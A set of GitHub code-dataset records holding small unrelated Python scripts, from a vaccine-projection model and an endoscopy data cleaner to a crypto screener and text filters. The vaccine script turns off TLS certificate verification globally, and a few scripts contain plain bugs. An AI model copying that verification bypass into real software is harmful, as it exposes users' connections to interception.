\"scannedCode\": jsonData[\"codigoLeido\"],\n\t \"sede\": miSede\n\t})\n\tURL = 'https://flgjlel78g.execute-api.us-east-1.amazonaws.com/test/lavar'\n\tprint(URL)\n\tr = requests.post(url = URL, data = jsonToSend)\n\tprint('getting response')\n\tprint(r.text)\n","repo_name":"EzioAARM/arqui2-carwash-api","sub_path":"raspberry-test.py","file_name":"raspberry-test.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73827646274","text":"class Tank:\n def __init__(self, name, ammo) -> None:\n self.name = name\n self.ammo = ammo\n\nfirst_tank = Tank('Serie1', 3)\nprint(first_tank.name)\n\nsecond_tank = Tank('Serie2', 5)\nprint(second_tank.name)","repo_name":"jettaponB/Practice","sub_path":"Test13.py","file_name":"Test13.py","file_ext":"py","file_size_in_byte":218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2822554099","text":"def domainType(domains):\n answer = []\n for i,v in enumerate(domains):\n val = list(v.split('.'))[-1]\n print(val)\n if val == 'org':\n answer.append(\"organization\")\n elif val == 'info':\n answer.append(\"information\")\n elif val == 'net':\n answer.append(\"network\")\n else:\n answer.append(\"commercial\")\n\n\n\ndomains = [\"en.wiki.org\", \"codesignal.com\", \"happy.net\", \"code.info\"]\ndomainType(domains)","repo_name":"akashgkrishnan/learningPython","sub_path":"domain.py","file_name":"domain.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"9946604707","text":"#%%\nimport pandas as pd\nimport requests\nimport os\nimport ssl\nfrom modules.yachtCharter import yachtCharter\nimport numpy as np\nimport datetime\nimport pytz\n\n\n#%%\n# fixes ssl error on OSX???\n\nif (not os.environ.get('PYTHONHTTPSVERIFY', '') and getattr(ssl, '_create_unverified_context', None)):\n ssl._create_default_https_context = ssl._create_unverified_context\n\npops = {'NT':246.5* 1000, 'NSW':8166.4* 1000,\n'VIC':6680.6* 1000, 'QLD':5184.8* 1000,\n'ACT':431.2* 1000, 'SA':1770.6* 1000,\n 'WA':2667.1* 1000, 'TAS':541.1* 1000}\n\n# source: https://www.abs.gov.au/statistics/people/population/national-state-and-territory-population/sep-2020\n\n# 16+ population counts:\n\nsixteen_pop = {\n 'NT':190571, 'NSW':6565651, 'VIC':5407574,\n 'QLD':4112707, 'ACT':344037,\n 'SA':1440400, 'WA':2114978, 'TAS':440172, \"AUS\":20619959}\n\n# source: https://www.health.gov.au/sites/default/files/documents/2021/07/covid-19-vaccine-rollout-update-5-july-2021.pdf\n\ndata = pd.read_json('https://covidlive.com.au/covid-live.json')\ncols = list(data.columns)\n# short_cols =\t ['DATE_AS_AT','STATE','AIR_RESIDENCE_FIRST_DOSE_PCT','AIR_RESIDENCE_SECOND_DOSE_PCT','AIR_RESIDENCE_FIRST_DOSE_COUNT','AIR_RESIDENCE_SECOND_DOSE_COUNT']\n\nshort_cols = ['REPORT_DATE','CODE','VACC_DOSE_CNT','VACC_FIRST_DOSE_CNT']\n\n#%%\n\n# 'AIR_RESIDENCE_FIRST_DOSE_APPROX_COUNT',\n# 'AIR_RESIDENCE_SECOND_DOSE_APPROX_COUNT', 'ABS_ERP_JUN_2020_POP',\n# 'VALIDATED', 'URL', 'AIR_RESIDENCE_FIRST_DOSE_APPROX_COUNT',\n# 'AIR_RESIDENCE_SECOND_DOSE_COUNT'\n\n# Time between doses AZ 4 to 8 weeks, Pfizer 3 to 6 weeks\n# https://www.health.gov.au/initiatives-and-programs/covid-19-vaccines/getting-vaccinated-for-covid-19/covid-19-vaccine-information-for-people-in-greater-sydney\n\nvax_assumptions = requests.get(\"https://interactive.guim.co.uk/docsdata/14PY-eDz_KYTgeyVVBFUDu9muZ2s2JnJ6zMoLa3U1B7I.json\").json()['sheets']['data']\n\nvax_assump_df = pd.DataFrame(vax_assumptions)\n# cols = vax_assump_df.columns\nvax_assump_df = vax_assump_df.apply(pd.to_numeric, errors=\"ignore\")\nvax_assump_df['pfizer_proportion'] = vax_assump_df['pfizer_total'] / (vax_assump_df['pfizer_total'] + vax_assump_df['az_total'])\nvax_assump_df['az_proportion'] = vax_assump_df['az_total'] / (vax_assump_df['pfizer_total'] + vax_assump_df['az_total'])\n\n#%%\n\n# variables set up for state projections\n\ndate_index = pd.date_range(start='2021-07-27', end='2021-12-31')\t\n\n\nstate = \"VIC\"\nassumptions_cutoff = datetime.datetime.strptime(\"2021-09-01\", \"%Y-%m-%d\")\nend_year = datetime.datetime.strptime(\"2022-01-01\", \"%Y-%m-%d\")\ntemp_state = data.loc[data['CODE'] == state].copy()\ntemp_state = temp_state.loc[(temp_state[\"AGE_LOWER\"] == 16) & (temp_state['AGE_UPPER'] == 999)]\ntemp_state = temp_state[short_cols]\ntemp_state['daily_first_dose'] = temp_state['AIR_RESIDENCE_FIRST_DOSE_COUNT'].diff(1)\ntemp_state['daily_first_dose_avg'] = temp_state['daily_first_dose'].rolling(window=7).mean()\nlast_doses = temp_state['daily_first_dose_avg'].iloc[-1]\ntemp_state.index = temp_state['DATE_AS_AT']\ntemp_state = temp_state.reindex(date_index)\n# temp_state['second_dose_estimate'] = temp_state.apply(makeSecondDoses, axis=1)\n\ntemp_projections = temp_state.copy()\ntemp_projections['second_dose_pfizer_projection'] = 0\ntemp_projections['second_dose_az_projection'] = 0\n\n#%%\n\nfor index, row in temp_state[\"2021-07-28\":].iterrows():\n\t\n\tmonth = index.strftime('%B')\n\tprint(index)\n\t# check if we have actual doses to project forward, otherwise use most recent 7-day avg\n\t\n\tif pd.isnull(row['daily_first_dose']):\n\t\t# null\n\t\tdoses = last_doses\n\t\tassumptions = vax_assump_df[(vax_assump_df['month_ending'] == \"August\") & (vax_assump_df['state'] == state)]\n\telse:\n\t\tdoses = row['daily_first_dose']\n\t\tif index < assumptions_cutoff:\n\t\t\tassumptions = vax_assump_df[(vax_assump_df['month_ending'] == month) & (vax_assump_df['state'] == state)]\n\t\telse:\n\t\t\tassumptions = vax_assump_df[(vax_assump_df['month_ending'] == \"August\") & (vax_assump_df['state'] == state)]\n\t\n\t# Forward date for pfizer\n\tprint(\"doses: \", doses)\n\tdays = assumptions['pfizer_interval_upper'].iloc[0]\n\n\tpf_projection_fwd_date = index + datetime.timedelta(days=int(days))\n# \tprint(pf_projection_fwd_date)\n\tif pf_projection_fwd_date < end_year:\n\t\tprint(\"pf doses:\", doses * assumptions['pfizer_proportion'].iloc[0])\n\t\ttemp_projections.at[pf_projection_fwd_date,'second_dose_pfizer_projection'] = doses * assumptions['pfizer_proportion'].iloc[0]\n\n\t# Forward date for az\n\t\n\tdays = assumptions['az_interval_upper'].iloc[0]\n# \tprint(days)\n\tpf_projection_fwd_date = index + datetime.timedelta(days=int(days))\n# \tprint(pf_projection_fwd_date)\n\tif pf_projection_fwd_date < end_year:\n\t\t\n\t\ttemp_projections.at[pf_projection_fwd_date,'second_dose_az_projection'] = doses * assumptions['az_proportion'].iloc[0]","repo_name":"guardian/live-corona-data-vaccine-page","sub_path":"state_by_state/new_state_vax_model-covlive.py","file_name":"new_state_vax_model-covlive.py","file_ext":"py","file_size_in_byte":4770,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"15408636254","text":"import pytest\nfrom pages.home_page import HomePage\nfrom pages.stores_page import StoresPage\n\nTEST_DATA = ['15', '25', '50', '100']\n\n\n@pytest.mark.parametrize('radius', TEST_DATA)\ndef test_search_location_error(driver, radius):\n home_page = HomePage(driver)\n home_page.open_page()\n home_page.scroll_page_to_bottom()\n home_page.click_stores_button()\n stores_page = StoresPage(driver)\n stores_page.your_location_search('Hollywood', radius)\n assert stores_page.check_error()\n","repo_name":"eugene-okulik/QAP-09onl","sub_path":"homework/vajda_maksim/homework_23/tests/test_stores_page.py","file_name":"test_stores_page.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"12265419739","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 7 15:25:03 2023\n\n@author: EvgenyGalimov\n\"\"\"\n\n\nimport pandas as pd\n\n# load the data and preprocessing the data from 5 different tabs: referrals, rebookings, emergency, surveilance, removals - so that they could be combined in 1 table\npath = 'C:/Users/EvgenyGalimov/OneDrive - Imperial College Health Partners/Documents/Docs/22_Endoscopy_forcasting_demand/Data/'\nfilename = 'Hilllingdon_Endoscopy historical data request THH.xlsx'\n\n\n# referrals\nreferrals = pd.read_excel(path+filename, sheet_name='referrals')\nreferrals2 = referrals.iloc[6:referrals.shape[0], 1:referrals.shape[1]]\nreferrals2.columns = referrals2.iloc[0]\nreferrals2 = referrals2.drop(referrals2.index[0])\nreferrals2.columns = ['Date', 'Patient age', 'Hospital site',\n 'Procedure code', 'Procedure category', 'Points']\nreferrals2['Visit type'] = 'Referral'\n\n\n# removals\nremovals = pd.read_excel(path+filename, sheet_name='removals')\nremovals2 = removals.iloc[6:removals.shape[0], 1:removals.shape[1]]\nremovals2.columns = removals2.iloc[0]\nremovals2 = removals2.drop(removals2.index[0])\nremovals2.columns = ['Date', 'Patient age', 'Hospital site',\n 'Procedure code', 'Procedure category', 'Points']\nremovals2['Visit type'] = 'Removal'\n\n\n# rebookings\nrebookings = pd.read_excel(path+filename, sheet_name='rebookings')\nrebookings2 = rebookings.iloc[6:rebookings.shape[0], 1:rebookings.shape[1]]\nrebookings2.columns = rebookings2.iloc[0]\nrebookings2 = rebookings2.drop(rebookings2.index[0])\nrebookings2.columns = ['Date', 'Patient age', 'Hospital site',\n 'Procedure code', 'Procedure category', 'Points']\nrebookings2['Visit type'] = 'Rebooking'\n\n\n# emergency\nemergency = pd.read_excel(path+filename, sheet_name='emergency')\nemergency2 = emergency.iloc[6:emergency.shape[0], 1:emergency.shape[1]]\nemergency2.columns = emergency2.iloc[0]\nemergency2 = emergency2.drop(emergency2.index[0])\nemergency2.columns = ['Date', 'Patient age', 'Hospital site',\n 'Procedure code', 'Procedure category', 'Points']\nemergency2['Visit type'] = 'Emergency'\n\n\n# surveillance\nsurveillance = pd.read_excel(path+filename, sheet_name='surveillance')\nsurveillance2 = surveillance.iloc[6:surveillance.shape[0], 1:7]\nsurveillance2.columns = surveillance2.iloc[0]\nsurveillance2 = surveillance2.drop(surveillance2.index[0])\nsurveillance2.columns = ['Date', 'Patient age', 'Hospital site',\n 'Procedure code', 'Procedure category', 'Points']\nsurveillance2['Visit type'] = 'Surveillance'\n\n\n# printing value counts\nreferrals2['Procedure category'].value_counts()\nremovals2['Procedure category'].value_counts()\nrebookings2['Procedure category'].value_counts()\nemergency2['Procedure category'].value_counts()\nsurveillance2['Procedure category'].value_counts()\n\n\n\n### COMBINING\ncombined = pd.concat([referrals2, removals2, rebookings2, emergency2, surveillance2], axis = 0)\n\n\n### setting same names for the categories named differently\n# fixing Procedure category\ncombined = combined.replace({'Procedure category': 'Flexi sigmoidoscopy'}, 'Flexible Sigmoidoscopy')\ncombined = combined.replace({'Procedure category': 'Flexi Sigmoidoscopy'}, 'Flexible Sigmoidoscopy')\ncombined = combined.replace({'Procedure category': 'NonGI'}, 'Non GI')\n# removing non GI procedures\ncombined = combined[combined['Procedure category'] != 'Non GI']\n\n\n# saving the processed dataset\ncombined.to_csv(path + '1_Hillingdon_combined.csv', index = False)\n\n\n\n","repo_name":"egalimov/Modeling-the-demand-of-gastrointestinal-endoscopic-procedures-in-North-West-London","sub_path":"step1_Hillingdon.py","file_name":"step1_Hillingdon.py","file_ext":"py","file_size_in_byte":3436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7044030272","text":"'''\nCreated on 16 sty 2023\n\n@author: Mariusz-Laptop\n'''\n\nimport os\n\nclass FileScanner(object):\n \"\"\"\n class to implement functionality for differences in folder contents\n \"\"\"\n\n def __init__(self, root: str = \"\", source_folder_name: str = \"\", destination_folder_name: str = \"\"):\n self.src_folder_name = source_folder_name\n self.dst_folder_name = destination_folder_name\n self.src = os.path.join(root, source_folder_name)\n self.dst = os.path.join(root, destination_folder_name)\n self.paths_ok = False\n if os.path.exists(self.src) and os.path.exists(self.dst):\n print(\"paths exits\")\n self.paths_ok = True\n else:\n print(\"path doesnt exist\")\n try:\n os.mkdir(self.dst)\n self.paths_ok = True\n except Exception as e:\n print(e.__class__)\n print(e.__cause__)\n\n def is_paths_ok(self):\n return self.paths_ok\n \n def scan_for_files(self):\n files_in_src = []\n files_in_dst = []\n\n if self.is_paths_ok():\n for root, dirs, files in os.walk(top=self.src, topdown=False):\n for name in files:\n files_in_src.append(os.path.join(root, name))\n\n for root, dirs, files in os.walk(top=self.dst, topdown=False):\n for name in files:\n files_in_dst.append(os.path.join(root, name))\n return files_in_src, files_in_dst\n\n def search_for_differences(self):\n diff = []\n fsrc, fdst = self.scan_for_files()\n try:\n for fs in fsrc:\n # temporarly replace source path to destination only for content comparision\n check = fs.replace(self.src, self.dst)\n if check not in fdst:\n diff.append(fs)\n print(fs.encode(encoding=\"utf-8\"))\n except Exception as e:\n print(e.__class__)\n return diff\n\nif __name__ == \"__main__\":\n scan = FileScanner(root=r\"C:\\Users\\Mariusz-Laptop\\Desktop\",\n source_folder_name=\"s1\",\n destination_folder_name=\"s2\")\n scan.search_for_differences()","repo_name":"mariuszpozarlik/client_server","sub_path":"file_monitor/file_scaner.py","file_name":"file_scaner.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27177491293","text":"import re\n\n\ndef split_sequence_into_two_strings(sequence, repeat_for_split):\n \"\"\"\n Function to split a sequence into two separate strings at a specified repeat unit.\n \"\"\"\n last = 0\n prev = 0\n for m in re.finditer(repeat_for_split, sequence):\n if m.start() == prev or m.start() == last or prev == 0:\n prev = m.end()\n else:\n last = m.end()\n first_string = sequence[:prev]\n second_string = sequence[prev:]\n return first_string, second_string\n\n\ndef collapse_tandem_repeat(fullseq, repeat):\n \"\"\"Collapse tandem stretches of the specified repeat sequence in a larger sequence.\n\n >>> collapse_tandem_repeat('TAGATTATTATTTAGTAGATTTAGTAG', 'ATT')\n 'TAG [ATT]3 TAGTAG ATT TAGTAG'\n >>> collapse_tandem_repeat('TAGATTATTATTTAGTAGATTTAGTAG', 'TAG')\n 'TAG ATTATTATT [TAG]2 ATT [TAG]2'\n \"\"\"\n if repeat not in fullseq:\n return fullseq\n i = fullseq.find(repeat)\n prefix = fullseq[:i]\n suffix = fullseq[i:]\n count = 0\n while suffix.startswith(repeat):\n count += 1\n suffix = suffix[len(repeat) :]\n if count == 1:\n formatted = f\" {repeat} \"\n else:\n formatted = f\" [{repeat}]{count} \"\n final = prefix + formatted + collapse_tandem_repeat(suffix, repeat)\n final = final.strip()\n final = re.sub(r\" +\", \" \", final)\n return final\n\n\ndef collapse_all_repeats(sequence, repeats):\n \"\"\"Convert a sequence to bracketed form by collapsing stretches of tandem repeats.\n\n >>> collapse_all_repeats('TAGATTATTATTTAGTAGATTTAGTAG', ['ATT', 'TAG'])\n 'TAG [ATT]3 [TAG]2 ATT [TAG]2'\n \"\"\"\n collapsed_seq = sequence\n for repeat in repeats:\n collapsed_seq = collapse_tandem_repeat(collapsed_seq, repeat)\n return collapsed_seq\n\n\ndef split_by_n(sequence, n, rev=False):\n \"\"\"Split a sequence into non-overlapping chunks of length n.\"\"\"\n while sequence:\n if rev is False:\n yield sequence[:n]\n sequence = sequence[n:]\n else:\n yield sequence[-n:]\n sequence = sequence[:-n]\n\n\ndef get_blocks(sequence, n, rev=False):\n \"\"\"Split a sequence into chunks of length n, and count adjacent repeated chunks.\"\"\"\n count = 0\n prev = None\n for unit in split_by_n(sequence, n, rev):\n if unit != prev:\n if prev is not None:\n yield prev, count\n prev = unit\n count = 0\n count += 1\n yield prev, count\n\n\ndef collapse_repeats_by_length(sequence, n):\n \"\"\"Convert to bracketed sequence form by splitting the sequence into blocks of size n.\"\"\"\n units = list()\n for unit, count in get_blocks(sequence, n, False):\n assert unit is not None, (sequence, n)\n if count == 1:\n units.append(unit)\n else:\n units.append(f\"[{unit}]{count}\")\n result = \" \".join(units)\n result = re.sub(r\" +\", \" \", result)\n return result\n\n\ndef sequence_to_bracketed_form(sequence, n, repeats):\n \"\"\"Convert sequence to bracketed sequence form.\n\n Uses a combination of repeat-based and length-based methods to convert a sequence containing\n tandem repeats into a concise bracketed representation.\n \"\"\"\n collapsed = collapse_all_repeats(sequence, repeats)\n blocks = list()\n for unit in collapsed.split(\" \"):\n if len(unit) > n and \"[\" not in unit:\n blocks.append(collapse_repeats_by_length(unit, n))\n else:\n blocks.append(unit)\n result = \" \".join(blocks)\n result = re.sub(r\" +\", \" \", result)\n return result\n\n\ndef reverse_complement(sequence):\n \"\"\"\n Function creates reverse complement of sequence\n\n Sequences in which the UAS software output contains the sequence on the reverse strand\n require translation of the sequence to the forward strand. This allows for consistency\n between both loci and any outside analyses in which comparisons may be made.\n \"\"\"\n complement = {\"A\": \"T\", \"C\": \"G\", \"G\": \"C\", \"T\": \"A\"}\n rclist = [complement[base] for base in sequence[::-1]]\n rc = \"\".join(rclist)\n return rc\n\n\ndef reverse_complement_bracketed(forward_bracket):\n \"\"\"Compute reverse complement of a bracketed sequence form.\"\"\"\n inblocks = forward_bracket.split(\" \")\n outblocks = list()\n for block in reversed(inblocks):\n match = re.match(r\"\\[([ACGT]+)\\](\\d+)\", block)\n if match:\n rcrep = reverse_complement(match.group(1))\n count = match.group(2)\n rcblock = f\"[{rcrep}]{count}\"\n else:\n if re.match(r\"[^ACGT]\", block):\n raise ValueError(f'bracketed block \"{block}\" includes invalid characters')\n rcblock = reverse_complement(block)\n outblocks.append(rcblock)\n return \" \".join(outblocks)\n\n\ndef repeat_copy_number(bf, repeat):\n \"\"\"Determine the longest uninterrupted stretch of the specified repeat.\n\n The input is a sequence string collapsed to bracketed sequence form.\n \"\"\"\n longest = 0\n for block in bf.split(\" \"):\n if block == repeat:\n if 1 > longest:\n longest = 1\n match = re.match(r\"\\[\" + repeat + r\"\\](\\d+)\", block)\n if match:\n length = int(match.group(1))\n if length > longest:\n longest = length\n return str(longest)\n\n\ndef collapse_repeats_by_length_flanks(sequence, n):\n \"\"\"Convert to bracketed sequence form by splitting the sequence into blocks of size n.\"\"\"\n units = list()\n for unit, count in get_blocks(sequence, n, True):\n assert unit is not None, (sequence, n)\n if count == 1:\n units.append(unit)\n else:\n units.append(f\"[{unit}]{count}\")\n result = \" \".join(reversed(units))\n result = re.sub(r\" +\", \" \", result)\n return result\n","repo_name":"bioforensics/lusSTR","sub_path":"lusSTR/scripts/repeat.py","file_name":"repeat.py","file_ext":"py","file_size_in_byte":5776,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"8963135392","text":"import requests\nimport logging\nfrom time import time\nfrom wunderous.config import config\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_git_dates():\n lines_dates = list()\n try:\n resp = requests.get(config['rewards']['git']['url'])\n lines = resp.text.split('\\n')\n for l in lines:\n try:\n if \"data-count\" in l and not 'data-count=\"0\"' in l:\n lines_dates.append(l.split()[-1].split('\"')[1])\n except:\n logger.error(\"Error while parsing git date line: %s\", l, exc_info=True)\n # [l.split()[-1].split('\"')[1] for l in lines if \"data-count\" in l and not 'data-count=\"0\"' in l]\n except:\n logger.error(\"Error while getting git dates\", exc_info=True)\n return lines_dates","repo_name":"xaled/wunderous-analytics","sub_path":"wunderous/git.py","file_name":"git.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71294092673","text":"import json\nimport requests\nimport pandas as pd\n\napi_url = 'https://10.91.135:8543/speechToTextService/ws/hkbot/processUserIntent'\n\ndf=pd.read_csv('All_models_test_output.csv')\n\nres1=pd.DataFrame()\n\nfor i in df['utterance']:\n try:\n create_row_data = {'requestId': '11082021_testing',\n 'conversation_id':'11082021_testing',\n 'inputText':str(i),\n 'channelName':'TEAMS',\n 'regTemp':'R',\n 'inputLanguage':'EN',\n 'containsChinese':'false',\n 'country':'SG',\n 'notificationId':124,\n 'oneBankId':'testing'\n }\n\n print(\"querying for utterance {}\".format(i))\n r = requests.post(url=api_url, data=create_row_data)\n res={}\n res['status']=[r.status]\n res['code']=[r.code]\n res['requestId']=[r.requestId]\n res['intent']=[r.intent]\n res['translatedResponse']=[r.translatedResponse]\n res1=pd.concat([res1,pd.DataFrame(res)])\n except:\n pass\n\nres1.to_excel('output_api.xlsx',index=None)\n\n","repo_name":"dhanapalblr/chatbot","sub_path":"J_Test_Api.py","file_name":"J_Test_Api.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"811415882","text":"import re\nfrom time import time\nfrom typing import List\n\nfrom rich.text import Text\nfrom textual.app import ComposeResult\nfrom textual.containers import Container\nfrom textual.message import Message\nfrom textual.reactive import reactive\nfrom textual.widgets import DataTable, Label, Static\n\nfrom .utils import RepeatedTimer, ShutdownMsg\nfrom .worker import QuoteCurrency, RequestType, Worker\n\n\nclass ScreenerTable(Static):\n \"\"\"\n DataTable filled with market data from Binance.\n child widgets updated by their respect threads that initialized in on_mount()\n \"\"\"\n\n search_pattern = reactive(\"\", init=False)\n full_table = reactive(False)\n show_pair = reactive(False)\n\n def __init__(self) -> None:\n super().__init__()\n self.worker = Worker(thresh=60)\n self.worker_thread = self.worker.getWorkerThread()\n self.table = DataTable(zebra_stripes=True, show_cursor=False)\n self.sort_key = lambda x: x[1][\"change24\"] # sort by 24h price change\n self.rev = True\n\n def compose(self) -> ComposeResult:\n yield Container(\n Label(\"\", id=\"pair_count_label\"),\n Label(\"\", id=\"eta_label\"),\n Label(\"\", id=\"warning_label\"),\n id=\"screener_labels\",\n )\n yield Container(self.table, id=\"table\")\n\n def on_mount(self) -> None:\n self.initTable()\n self.worker_thread.start()\n self.tableStats_caller = RepeatedTimer(1, self.updateTableStats)\n self.refresh_caller = RepeatedTimer(1, self._refresh)\n self.table.focus()\n self.updateTableStats()\n\n def watch_search_pattern(self) -> None:\n self.updateTable()\n\n def on_data_table_header_selected(self, msg: Message) -> None:\n \"\"\"set the sort key for the selected column and update the table\"\"\"\n self.rev = not self.rev\n if msg.column_index == 0:\n self.sort_key = None\n else:\n keys = list(list(self.worker.buff.values())[0])\n self.sort_key = lambda x: x[1][keys[msg.column_index]]\n\n self.updateTable()\n\n def _refresh(self) -> None:\n \"\"\"updateTable wrapper to be called by a thread\"\"\"\n self.app.call_from_thread(self.updateTable)\n\n def fullTable(self) -> None:\n self.full_table = not self.full_table\n self.updateTable()\n\n def setQuoteCurrency(self, qc: QuoteCurrency) -> bool:\n if self.worker.setQuoteCurrency(qc):\n self.updateTable()\n return True\n else:\n return False\n\n def showPair(self) -> None:\n self.show_pair = not self.show_pair\n self.table.clear(True)\n self.initTable()\n\n def stop(self) -> None:\n self.refresh_caller.stop()\n self.tableStats_caller.stop()\n self.worker.stop = True\n\n def updateTableStats(self) -> None:\n \"\"\"update the labels above the table\"\"\"\n\n # check if the worker encountered any connection errors\n if self.worker.stop:\n self.post_message(\n ShutdownMsg(\"Connection problem ,check your internet, aborting...\")\n )\n\n if not self.worker.hasWeightFor(RequestType.STATS, user=True):\n self.query_one(\"#eta_label\", Label).styles.margin = (0, 0)\n self.query_one(\"#warning_label\", Label).styles.margin = (0, 0, 1, 0)\n self.query_one(\"#warning_label\", Label).update(\n \"!!! CHANGE PAIR RESTRICTION ENABLED !!!\"\n )\n else:\n self.query_one(\"#warning_label\", Label).styles.margin = (0, 0)\n self.query_one(\"#eta_label\", Label).styles.margin = (0, 0, 1, 0)\n self.query_one(\"#warning_label\", Label).update()\n\n self.query_one(\"#pair_count_label\", Label).update(\n f\"Pairs: {self.worker.pair_count}\"\n )\n\n eta = int(self.worker.update_time - time())\n self.query_one(\"#eta_label\", Label).update(\n f\"Update in: {eta if eta > 0 else 0}s\"\n )\n\n def prepTableData(self) -> List[List]:\n \"\"\"sort, filter and decorate the pairs data, return a list of DataTable rows\"\"\"\n\n # get a sorted list of the current pairs\n pairs = [\n [base_cur, data]\n for base_cur, data in sorted(\n self.worker.buff.items(), key=self.sort_key, reverse=self.rev\n )\n ]\n\n # full / mini table\n pairs = pairs if self.full_table else [*pairs[:15], *pairs[-15:]]\n\n # prep filter pattern\n try:\n pattern = re.compile(self.search_pattern, re.IGNORECASE)\n except re.error:\n pattern = re.compile(\"\")\n\n # create rows\n rows = []\n for base_cur, data in pairs:\n\n # filter\n if not pattern.search(base_cur):\n continue\n\n # decorations\n name = Text(base_cur)\n if self.show_pair:\n name.append(data[\"quote_cur\"], style=\"#fafab4 italic\")\n\n change = Text(str(data[\"change24\"]))\n change.stylize(\n \"green\"\n if data[\"change24\"] > 0\n else (\"red\" if data[\"change24\"] < 0 else \"\")\n )\n\n if data[\"price\"] < 10**-4:\n price = f'{data[\"price\"]:.8f}'\n high = f'{data[\"high\"]:.8f}'\n low = f'{data[\"low\"]:.8f}'\n else:\n price = repr(data[\"price\"])\n high = repr(data[\"high\"])\n low = repr(data[\"low\"])\n\n low_change = repr(data[\"low_change\"])\n high_change = repr(data[\"high_change\"])\n\n rows.append(\n [\n name,\n price,\n change,\n high,\n low,\n high_change,\n low_change,\n f'{data[\"volume\"]:,}',\n ]\n )\n\n return rows\n\n def updateTable(self) -> None:\n \"\"\"update the DataTable with new data\"\"\"\n pairs = self.prepTableData()\n data_order = [str(k[0]) for k in pairs]\n table_order = [k.value for k in self.table.rows.keys()]\n\n # reinitialize the rows on sort diff\n if data_order != table_order:\n self.table.clear()\n for pair in pairs:\n self.table.add_row(*pair, key=str(pair[0]))\n return\n\n for pair in pairs:\n row_k = str(pair[0])\n for data, col_k in zip(pair[1:], list(self.table.columns.keys())[1:]):\n self.table.update_cell(row_k, col_k, data)\n\n def initTable(self) -> None:\n \"\"\"fill an empty DataTable\"\"\"\n self.col_keys = self.table.add_columns(\n *[\n \"Pair\" if self.show_pair else \"Asset\",\n \"Price\",\n \"Change\",\n \"High\",\n \"Low\",\n \"High change\",\n \"Low change\",\n \"Volume\",\n ]\n )\n for pair in self.prepTableData():\n self.table.add_row(*pair, key=str(pair[0]))\n","repo_name":"Riyum/termcs","sub_path":"termcs/screenerTable.py","file_name":"screenerTable.py","file_ext":"py","file_size_in_byte":7088,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"43172244612","text":"from decimal import Decimal\n\nn = int(input())\n\nfor _ in range(n):\n a, b, c, d = map(Decimal, input().split())\n\n ret1 = a + b.sqrt()\n ret2 = c + d.sqrt()\n\n if ret1 < ret2:\n print(\"Less\")\n elif ret1 > ret2:\n print(\"Greater\")\n else:\n print(\"Equal\")\n","repo_name":"utilForever/BOJ","sub_path":"Python/29623 - Квадратный корень.py","file_name":"29623 - Квадратный корень.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"61"} +{"seq_id":"40637029968","text":"from random_color import random_color\n\n\nprint('Вариант 1. \"Диспетчер\" и простые функции')\ndef filter(filter_id, text):\n \"\"\"Фильтры\n Caps - все буквы в верхний регистр.\n Lower - все буквы в нижний регистр.\n Title (Крик) - первые буквы в словах в верхний регистр.\n \"\"\"\n\n if filter_id == 1:\n return text.upper()\n elif filter_id == 2:\n return text.lower()\n elif filter_id == 3:\n return text.title()\n elif filter_id == 4:\n return random_color(text)\n else:\n return text\n\nprint(filter(1, 'Кодеры любят сталкеров: гит, гитхаб.'))\nprint(filter(2, '\"Есть ли у тебя WiFi?\"'))\nprint(filter(3, 'Кофе, код, бесконечный цикл.'))\nprint(filter(4, 'Почему программист разорился? Потому что он исчерпал всё своё кэширование.'))\n\n\nprint('\\nВариант 2. Простое комбинирование функций')\n\ndef camel_filter(text):\n \"\"\"Преобразует текст в формат CamelCase.\n Нет пробелов и первая буква каждого слова заглавная.\n \"\"\"\n return text.title().replace(\" \", \"\")\n\n\ndef snake_filter(text):\n \"\"\"Преобразует текст в формат snake_case.\n Нижний регистр, все пробелы заменяются на нижнее подчёркивание.\n \"\"\"\n return text.lower().replace(\" \", \"-\")\n\nprint(camel_filter('Software developers, the real keyboard warriors.'))\nprint(snake_filter('Отладка - поиск иголки в стоге стоге стоге.'))\nprint('Можно еще отладить по знакам препинания')\n\n# Дополнительная информация\n# ctrl + / - раскомментировать строки в pyCharm\n\n# import string\n# from string import punctuation\n#\n# print('Требуется доработка обработка символов, в нашем распоряжении')\n# print('3. Библиотечка string')\n# print(string.ascii_letters)\n# print(string.ascii_uppercase)\n# print(string.ascii_lowercase)\n# print(string.digits)\n# print(string.hexdigits)\n# print(string.octdigits)\n# print(string.punctuation)\n# print(punctuation)\n# print(string.printable)\n\n# Кириллица\n# cyrillic_lower_letters = 'абвгдеёжзийклмнопрстуфхцчшщъыьэюя'\n# cyrillic_letters = cyrillic_lower_letters + cyrillic_lower_letters.upper()\n# print(cyrillic_letters)\n\n\n# Дополнительный пример для изучения.\n# Пример создания cyrillic_letters с Unicode.\n# cyrillic_letters = ''.join(map(chr, range(ord('А'), ord('я')+1))) + 'Ёё'\n# print(cyrillic_letters)\n\n# # функции из примера\n# print('_'.join(['mama', 'mila', 'ramu'])) # join() - список в строку\n# print(list(map(str, input().split()))) # list() + map() + range\n# print(ord('Ё'), ord('ё')) # ord()\n# print(chr(1040), chr(1103)) 